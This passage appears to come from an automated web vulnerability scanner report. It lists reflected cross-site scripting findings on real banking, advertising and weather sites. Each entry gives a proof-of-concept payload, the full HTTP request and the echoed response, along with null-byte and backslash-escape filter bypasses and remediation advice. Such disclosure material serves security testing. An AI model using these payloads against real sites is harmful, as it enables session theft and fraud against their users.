pf=vYlmmNe4wlXMju21sv8E9BbQtqzBjZadwYr3eEaEEdXu2q8_Jo62qDoNU1sRcsTDMLxOqe5U8OfgCnbpqI2ApX4lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 19:02:59 GMT
Content-Length: 377
1.431. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://search.wachovia.com
Path: /selfservice/microsites/wachoviaSearchEntry.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaef9"><script>alert(1)</script>6d3f3e1bc4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selfservice/microsites/wachoviaSearchEntry.do?aaef9"><script>alert(1)</script>6d3f3e1bc4b=1 HTTP/1.1
Host: search.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E2F343A11D72B8481BC40D2D653F4B5; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Date: Thu, 03 Feb 2011 13:17:41 GMT
Connection: close
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85494'%3balert(1)//dbe71432c4e was submitted in the h parameter. This input was echoed as 85494';alert(1)//dbe71432c4e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=21818F4&w=300&h=25085494'%3balert(1)//dbe71432c4e&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:48 GMT
Connection: close
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed62"%3balert(1)//eec28b3a643 was submitted in the pid parameter. This input was echoed as aed62";alert(1)//eec28b3a643 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=21818F4aed62"%3balert(1)//eec28b3a643&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:46 GMT
Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://smm.sitescout.com/disp?pid=21818F4aed62";alert(1)//eec28b3a643&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C1220000175%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D134%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woB ...[SNIP]...
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79fda'%3balert(1)//cbed4520d8d was submitted in the w parameter. This input was echoed as 79fda';alert(1)//cbed4520d8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=21818F4&w=30079fda'%3balert(1)//cbed4520d8d&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:46 GMT
Connection: close
1.435. http://thestreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://thestreet.us.intellitxt.com
Path: /intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1bad9<script>alert(1)</script>6e86ca26221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /intellitxt/front.asp?ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1 HTTP/1.1 Host: thestreet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA6yAEAAAEthmhrrQA-; VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+c+YAA-; Domain=.intellitxt.com; Expires=Mon, 04-Apr-2011 14:22:36 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/x-javascript Vary: Accept-Encoding Date: Thu, 03 Feb 2011 14:22:36 GMT Connection: close Content-Length: 8275
/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */ if('undefined'==typeof $iTXT){var $iTXT={};}if('undefined'==typ ...[SNIP]... ad();}}};function itxtBegin(){ var itxturl='http://thestreet.us.intellitxt.com/v3/door.jsp?ts='+(new Date()).getTime()+'&pagecl='+itxtbtl()+'&enc='+itxtGCE()+'&fv='+gDFVS()+'&muid='+MUID+'&ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1'; itxturl+='&seid='+gSEID+'&sest='+gSEST; if ($iTXT && $iTXT.js && $iTXT.js.ready) {$iTXT.js.load(itxturl); } else if ($iTXT && $iTXT.js) {$iTXT.js.onload = function() { $iTXT.js.load(itxturl); ...[SNIP]...
The value of the sest request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbce3\'%3balert(1)//470e2868204 was submitted in the sest parameter. This input was echoed as cbce3\\';alert(1)//470e2868204 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /v3/door.jsp?ts=1296742745648&pagecl=2359&enc=&fv=101&muid=&ipid=10685&seid=0&sest=cbce3\'%3balert(1)//470e2868204 HTTP/1.1 Host: thestreet.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+LRYAA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: application/x-javascript;charset=iso-8859-1 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 14:22:49 GMT Connection: close Content-Length: 10430
/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */ try{if('undefined'==typeof $iTXT){var $iTXT={};}$iTXT.door={} ...[SNIP]... omponent(tTXT.replace(/\n/,' ')); while (p.ttxt.indexOf('\'')>-1) p.ttxt=p.ttxt.replace('\'', '%27');p.auat=0;p.lpgv=0;p.ddate=dDate;p.pvu=gPVU;p.pvm=gPVM;p.forcedb=0;p.seid=gSEID;p.unrm=false;p.sest='cbce3\\';alert(1)//470e2868204';p.ru=encodeURIComponent(sRU);cAs(server,p);} else if (gCL){if(((gITXTN!=null&&gITXTN.length)||(gITXTNi!=null&&gITXTNi.length))&&gCL> ...[SNIP]...
The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 was submitted in the zcode parameter. This input was echoed as 478ba"style="x:expression(alert(1))"78c9aed888 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?zip=75201&zcode=478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 103556 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:34:49 GMT Connection: close
The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 531ee"%3balert(1)//40807062aa8 was submitted in the zcode parameter. This input was echoed as 531ee";alert(1)//40807062aa8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?zip=75201&zcode=6292531ee"%3balert(1)//40807062aa8 HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 100657 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:34:53 GMT Connection: close
...[SNIP]... <script type="text/javascript"> var feedbackURL = "http://weather.weatherbug.com/feedback-form.html?zcode=6292531ee";alert(1)//40807062aa8&region=8&region_name=North America&country=US&country_name=USA&state_code=TX&state_name=Texas&zip=75201&city_name=Dallas&stat=DALS1"; </script> ...[SNIP]...
The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc was submitted in the zcode parameter. This input was echoed as 3b886"style="x:expression(alert(1))"e0fb95ae5dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?zip=75201&zcode=62923b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 104331 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:34:36 GMT Connection: close
The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c92\'%3balert(1)//fb3d6162354 was submitted in the zcode parameter. This input was echoed as b8c92\\';alert(1)//fb3d6162354 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /?zip=75201&zcode=6292b8c92\'%3balert(1)//fb3d6162354 HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 101771 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:35:04 GMT Connection: close
1.441. http://www.bbt.com/bbt/Business/Products/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/Business/Products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f5e39"><script>alert(1)</script>409e4716c9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5e39"><script>alert(1)</script>409e4716c9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/Business/Products/?%00f5e39"><script>alert(1)</script>409e4716c9d=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:13 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 53268 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
1.442. http://www.bbt.com/bbt/Personal/Products/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/Personal/Products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0069b54"><script>alert(1)</script>e1573406ba9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b54"><script>alert(1)</script>e1573406ba9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/Personal/Products/?%0069b54"><script>alert(1)</script>e1573406ba9=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:49 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 40557 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
1.443. http://www.bbt.com/bbt/about/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/about/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002a618"><script>alert(1)</script>b69e85cef55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a618"><script>alert(1)</script>b69e85cef55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/about/?%002a618"><script>alert(1)</script>b69e85cef55=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:46 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 27477 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> < ...[SNIP]... <a href="/bbt/about/default.html?page=print&%002a618"><script>alert(1)</script>b69e85cef55=1" onClick="NewWindow(this.href,'product','650','500','yes');return false;"> ...[SNIP]...
1.444. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007a93d"><script>alert(1)</script>a2f88c48136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a93d"><script>alert(1)</script>a2f88c48136 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/about/privacyandsecurity/completeclientprotection/default.html?%007a93d"><script>alert(1)</script>a2f88c48136=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:35 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 30854 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
1.445. http://www.bbt.com/bbt/careers/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/careers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0012a7a"><script>alert(1)</script>5fb5315ccee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12a7a"><script>alert(1)</script>5fb5315ccee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
